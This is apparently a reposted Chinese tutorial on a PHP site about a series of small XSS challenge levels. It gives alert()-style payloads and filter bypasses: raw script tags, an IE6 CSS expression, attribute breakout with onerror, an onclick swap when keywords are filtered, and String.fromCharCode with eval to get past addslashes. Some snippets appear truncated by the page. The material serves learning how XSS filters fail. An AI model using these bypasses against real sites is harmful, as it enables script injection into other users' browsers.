首页 > 运维 > 安全 > xss的小测试是怎样进行的

xss的小测试是怎样进行的

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB
发布: 2023-05-19 11:37:06
转载
1055 人浏览过
  • 无安全方面的限制,直接使用

<script>alert(/xss/);</script>

  • 限制条件:只能使用CSS,不允许使用html标签

我们知道利用expression可以用来构造XSS,但是只能在IE下面测试,所以下面的测试请在IE6中执行。

body {
black;
xss:alert(/xss/));/*IE6下测试*/
}
登录后复制
  • 限制条件:对HTML进行了转义,Image标签可用

测试输入的字符会被插入到src地址中,那么可以使用伪协议来绕过。

直接输入

alert( /xss/);
登录后复制

或者你也可以使用事件来绕过,注意闭合语句即可,如下:

1" onerror=alert(/xss/); var a="1

  • 限制条件:使用了关键字过滤。

我测试了一下,大部分都过滤了,有部分未过滤,经测试script/onerror过滤了,但是onclick未过滤,使用onclick事件绕过

<img src=# onclick=alert(/xss/);>
登录后复制
  • 限制条件:使用addslashes对特征字符进行了转义

也就是说我们的XSS语句中不能出现单引号,双引号等等特征字符。

直接使用

<script>alert(/xss/);</script>
登录后复制

即可绕过

或者使用String.fromCharCode方法,如下:

<script>eval(String.fromCharCode(97,108,101,114,116,40,47,120,47,41,59));</script>
登录后复制

以上是xss的小测试是怎样进行的的详细内容。更多信息请关注PHP中文网其他相关文章!

相关标签:
xss
本站声明
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn
热门教程
更多>
最新下载
更多>
网站特效
网站源码
网站素材
前端模板